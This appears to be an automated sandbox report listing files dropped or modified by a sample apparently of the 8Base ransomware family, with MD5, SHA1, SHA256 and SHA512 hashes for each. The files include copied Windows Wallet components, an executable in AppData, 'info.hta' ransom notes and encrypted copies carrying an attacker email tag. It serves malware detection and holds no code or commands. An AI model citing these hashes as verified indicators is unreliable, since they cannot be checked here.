SHA256 32737c8e34b90b7f0d57b607b07b641f7b8a80ae4797856c6cb8ccbf8c1414fe
SHA512 09bff5f078a0834e8ac11a02fc57763aac1224e06d0ecf7940af38d2bc5e41b38ff5d508bd1c8a73b46c68a3c01916d1ed2e18925e0b1d2fe6d10d422ad7b4b8

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_de-de_6544a4ab6302c712\WalletService.dll.mui

MD5 79f7d3e335ebb7bd9ae87eab7ca3cf16
SHA1 665212f4c50d73fc5b4d6c70c06297ca3ac815c0
SHA256 d7dac445a427f96c20b7d76fe6726c1ed9d3b741fcb4733fdd0c6b747f9f3326
SHA512 3150d5985c9d7831d8eaf3481ed6166efc37436964660ee1a6ca165ee09ea6ba46a861e43ccd82061bd12d05a8ee65d6ff91d9c46f85dd458b04e60994b8e3cc

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll

MD5 b7d6a6bb752e0f3b336fe9f48f2bd17f
SHA1 b2c212468d9e4988a13ebf5b8397fc864e958d4a
SHA256 6aafa6d7ee7b50f43a1a74f518132ad1f9e0ca2c7c1c83cb0508e716a7eef276
SHA512 0210af854ea1504d1d15b17979e3fb3140c3ddf037dbb828c42e4b656f93696744aa1f88c2e94e67781eaa16d923b69fb016d30e99879cca41f69fe9e3b1004d

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\r\WalletService.dll

MD5 516049b4656f0540b3900a19c43eb0e7
SHA1 6fd0260fe345c763e042842d204c8cddb4d9e1d9
SHA256 d53a4afc80b79999013bfd983bdb0a5ddded457397debf149002335c2fceadaf
SHA512 2dca05b264bffcc62e3b92b5e61aa037ef858f6f625e5c0e946a82f1edf7586c17244001093567ff534c4c31e41dc6446fbb23e5f1c6b6a5fe798f2dd6d939ef

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\f\WalletService.dll

MD5 204c37449f2f435bcd47fc3a33589ba8
SHA1 b8ce4d2b474a44b151f4252f44fc3d6c5d49e8f9
SHA256 23387b832b727f280fd036581cacabdebf1ccacc1c9c6782939487f9456627a6
SHA512 54c3cdce836703500b02aba2d715ad0c3e803a79ba49b6b436aecfc580c47081cd9a384e913c50b121c2dd2f1ece8a62bdeee6d40c33cc438154966cb075d677

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.1_none_8eded76dfc707d27\WalletService.dll

MD5 4925079bb1e3bc51bd8745ef5aa6325e
SHA1 c6b6a57df4645f4f1efae6ed539aa618851d76df
SHA256 061fd9560a1cd66cf4b9f871c2f93af2c44720ae8134f325c1d12841489267cb
SHA512 4efa6227d46bc97e59f31f4949ebe5951958b6dac86c5208d8f9221ce9d732ffea225383a1b8ee23455455f68c3dba6ff6b3eee8bd23d4fc43f6891970220de7

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\SysWOW64\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\System32\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\System32\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\25C8\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe.xml

MD5 108f130067a9df1719c590316a5245f7
SHA1 79bb9a86e7a50c85214cd7e21719f0cb4155f58a
SHA256 c91debd34057ca5c280ca15ac542733930e1c94c7d887448eac6e3385b5a0874
SHA512 d43b3861d5153c7ca54edd078c900d31599fc9f04d6883a449d62c7e86a105a3c5dfb2d232255c41505b210b063caf6325921dc074fcdf93407c9e2c985a5301

C:\Users\Admin\AppData\Local\Temp\25C8\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml

MD5 94f90fcd2b8f7f1df69224f845d9e9b7
SHA1 a09e3072cc581cf89adaf1aa20aa89b3af7bf987
SHA256 a16113a66b1c36f919b5f7eaa3fb7aa8e0ba9e057823861aabea703cc06a04c0
SHA512 51f4ee06a8d8bf1121083bf4383433160f16c68d1fe4c44e5d0e0529910d27ba8446c7a4bef359b990574d1d61563da30139c6d09ad0ad1a5b5c7748b8da08f3

C:\Users\Admin\AppData\Local\Temp\25C8\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe.xml

MD5 108f130067a9df1719c590316a5245f7
SHA1 79bb9a86e7a50c85214cd7e21719f0cb4155f58a
SHA256 c91debd34057ca5c280ca15ac542733930e1c94c7d887448eac6e3385b5a0874
SHA512 d43b3861d5153c7ca54edd078c900d31599fc9f04d6883a449d62c7e86a105a3c5dfb2d232255c41505b210b063caf6325921dc074fcdf93407c9e2c985a5301

C:\Users\Admin\AppData\Local\Temp\25C8\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll

MD5 1847592b1d79ca8cda562cdc8ebbee3a
SHA1 aabd9b274d5925ce4fa689eb562d6e6ea191d16e
SHA256 7d4333c8fd697215dee03640cfe6a3bf911352cdd15c20efb9b7569f69410fcf
SHA512 a60709a97b7c2c9e57e29b4e56471bb81f2e02cc374ea5417ed61c3be0c08c65202962e8b9746e6ee772ee9e55cb06ac09c888b13b7487ba6908d5fef473d56a

C:\Users\Admin\AppData\Local\Temp\25C8\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe.xml

MD5 94f90fcd2b8f7f1df69224f845d9e9b7
SHA1 a09e3072cc581cf89adaf1aa20aa89b3af7bf987
SHA256 a16113a66b1c36f919b5f7eaa3fb7aa8e0ba9e057823861aabea703cc06a04c0
SHA512 51f4ee06a8d8bf1121083bf4383433160f16c68d1fe4c44e5d0e0529910d27ba8446c7a4bef359b990574d1d61563da30139c6d09ad0ad1a5b5c7748b8da08f3

C:\Users\Admin\AppData\Local\Temp\25C8\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe

MD5 cfe72ed40a076ae4f4157940ce0c5d44
SHA1 8010f7c746a7ba4864785f798f46ec05caae7ece
SHA256 6868894ab04d08956388a94a81016f03d5b7a7b1646c8a6235057a7e1e45de32
SHA512 f002afa2131d250dd6148d8372ce45f84283b8e1209e91720cee7aff497503d0e566bae3a83cd326701458230ae5c0e200eec617889393dd46ac00ff357ff1b0

C:\Users\Admin\AppData\Roaming\bcdvfaf

MD5 b13025c931729f5c974c82821458c0ed
SHA1 4b11c4f0357d6b80620d0795845fafb193c6374e
SHA256 59bc49cb4b42869540d0f6ebf869efc7c6530ee1d1cdb303094c5f4587b7ac54
SHA512 2a1a68e55ad2c8f39801c47d9b97016c7d3838f15f079fd37f8a1efd8a0588fab75e201a94422095dbfb5b1681f7a613dbce3ebee10ed32d5edd779ad3edfb5b

C:\Users\Admin\AppData\Roaming\ivsvwev

MD5 9769c181ecef69544bbb2f974b8c0e10
SHA1 5d0f447f4ccc89d7d79c0565372195240cdfa25f
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
SHA512 b3da8fea6ee5d6b67f55a4043f18d7325f1700c9f3dcb0e7cbf21f49ebdbb56b5a10a2d03153d0dfb1e8dc34db20cdea0236c448f2c361fadbabf9a6f59b4c7a

C:\Users\Admin\AppData\Roaming\Riqyrsb.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\info.hta

MD5 df5ace2aa3b4863f359a970ed55a2553
SHA1 77d3929dec9b6fe9f92549aaf1ebffdf6d744c63
SHA256 a6a586146947d77fecd660fde0d86e6aa40ddbcbcc919f80ac104eb633a6b097
SHA512 4fed2b232db1b718665b62ea419e1231b5e79295e8b6c1da97224e6f1a789fa690deb9d782156faaffa314f1c56f1dd369f125220649b1b99018515b1beea9d2

C:\users\public\desktop\info.hta

MD5 df5ace2aa3b4863f359a970ed55a2553
SHA1 77d3929dec9b6fe9f92549aaf1ebffdf6d744c63
SHA256 a6a586146947d77fecd660fde0d86e6aa40ddbcbcc919f80ac104eb633a6b097
SHA512 4fed2b232db1b718665b62ea419e1231b5e79295e8b6c1da97224e6f1a789fa690deb9d782156faaffa314f1c56f1dd369f125220649b1b99018515b1beea9d2

C:\info.hta

MD5 df5ace2aa3b4863f359a970ed55a2553
SHA1 77d3929dec9b6fe9f92549aaf1ebffdf6d744c63
SHA256 a6a586146947d77fecd660fde0d86e6aa40ddbcbcc919f80ac104eb633a6b097
SHA512 4fed2b232db1b718665b62ea419e1231b5e79295e8b6c1da97224e6f1a789fa690deb9d782156faaffa314f1c56f1dd369f125220649b1b99018515b1beea9d2

C:\Users\Admin\Desktop\info.hta

MD5 df5ace2aa3b4863f359a970ed55a2553
SHA1 77d3929dec9b6fe9f92549aaf1ebffdf6d744c63
SHA256 a6a586146947d77fecd660fde0d86e6aa40ddbcbcc919f80ac104eb633a6b097
SHA512 4fed2b232db1b718665b62ea419e1231b5e79295e8b6c1da97224e6f1a789fa690deb9d782156faaffa314f1c56f1dd369f125220649b1b99018515b1beea9d2

F:\info.hta

MD5 df5ace2aa3b4863f359a970ed55a2553
SHA1 77d3929dec9b6fe9f92549aaf1ebffdf6d744c63
SHA256 a6a586146947d77fecd660fde0d86e6aa40ddbcbcc919f80ac104eb633a6b097
SHA512 4fed2b232db1b718665b62ea419e1231b5e79295e8b6c1da97224e6f1a789fa690deb9d782156faaffa314f1c56f1dd369f125220649b1b99018515b1beea9d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 462f15e44660f134e2937b23a1b568aa
SHA1 23bc277fec4a2f1a6fd5fa6a74978e35aadc96b3
SHA256 e5630fd3881592a19e0077ff6ec5a64c3418a7ad6fa5e49cab1931f54cc0ff1f
SHA512 9c9d0f84dbaef63f5b22818e4156fcc1be9bf32fdd8379073f730feba06760a0a295dfaff767b2eecf095146306d6d1f927d26c48a4c002262a3f1107dae5b97

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b47ec42ace2c3aa4c9e9d80528880c0c
SHA1 e4a0f11501a2dc875603b61a5bc5bc0db8ba82be
SHA256 15456fb085732a3c1d257e243e27e567958950eb69c5d884c1222ed185f4a986
SHA512 89524ab7a47df1e3e44fc05c046f2417231a5dfa415be4c6e4b3ff1e322447277ec0dd5fb23a60ecf081d271abd340411d99c680306fc6e28ed3af13cbe8fe13

C:\Users\Admin\AppData\Local\Temp\25C8\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll.id[BEF4EEF6-3483].[[email protected]].8base

MD5 1847592b1d79ca8cda562cdc8ebbee3a
SHA1 aabd9b274d5925ce4fa689eb562d6e6ea191d16e
SHA256 7d4333c8fd697215dee03640cfe6a3bf911352cdd15c20efb9b7569f69410fcf
SHA512 a60709a97b7c2c9e57e29b4e56471bb81f2e02cc374ea5417ed61c3be0c08c65202962e8b9746e6ee772ee9e55cb06ac09c888b13b7487ba6908d5fef473d56a

C:\Users\Admin\AppData\Local\Temp\25C8\C\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe.id[BEF4EEF6-3483].[[email protected]].8base

MD5 c7d6148cd1b15fcf46a3a157a25f7ffe
SHA1 dc9c53c0a3815bb3c5413f4811150d9da41ead45
SHA256 986d851566285717b77ba6cf53551301d2832b024fa62ac467e06e91fc01bc1a
SHA512 37b4d8b0e8dd282d971b6e0860c096f258e7fd0e4ec0c2c9a8bdc64b1c3b32f8c411fb75865fd4492132a2cfef70fe6a2a43ada7bf9542da3a68b57c5dabf21e

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll

MD5 d09724c29a8f321f2f9c552de6ef6afa
SHA1 d6ce3d3a973695f4f770e7fb3fcb5e2f3df592a3
SHA256 23cc82878957683184fbd0e3098e9e6858978bf78d7812c6d7470ebdc79d1c5c
SHA512 cc8db1b0c4bbd94dfc8a669cd6accf6fa29dc1034ce03d9dae53d6ce117bb86b432bf040fb53230b612c6e9a325e58acc8ebb600f760a8d9d6a383ce751fd6ed

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll

MD5 1097d1e58872f3cf58f78730a697ce4b
SHA1 96db4e4763a957b28dd80ec1e43eb27367869b86
SHA256 83ec0be293b19d00eca4ae51f16621753e1d2b11248786b25a1abaae6230bdef
SHA512 b933eac4eaabacc51069a72b24b649b980aea251b1b87270ff4ffea12de9368d5447cdbe748ac7faf2805548b896c8499f9eceeed2f5efd0c684f94360940351

C:\Users\Admin\AppData\Local\Temp\25C8\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll

MD5 02557c141c9e153c2b7987b79a3a2dd7
SHA1 a054761382ee68608b6a3b62b68138dc205f576b
SHA256 207c587e769e2655669bd3ce1d28a00bcac08f023013735f026f65c0e3baa6f4
SHA512 a37e29c115bcb9956b1f8fd2022f2e3966c1fa2a0efa5c2ee2d14bc5c41bfddae0deea4d481a681d13ec58e9dec41e7565f8b4eb1c10f2c44c03e58bdd2792b3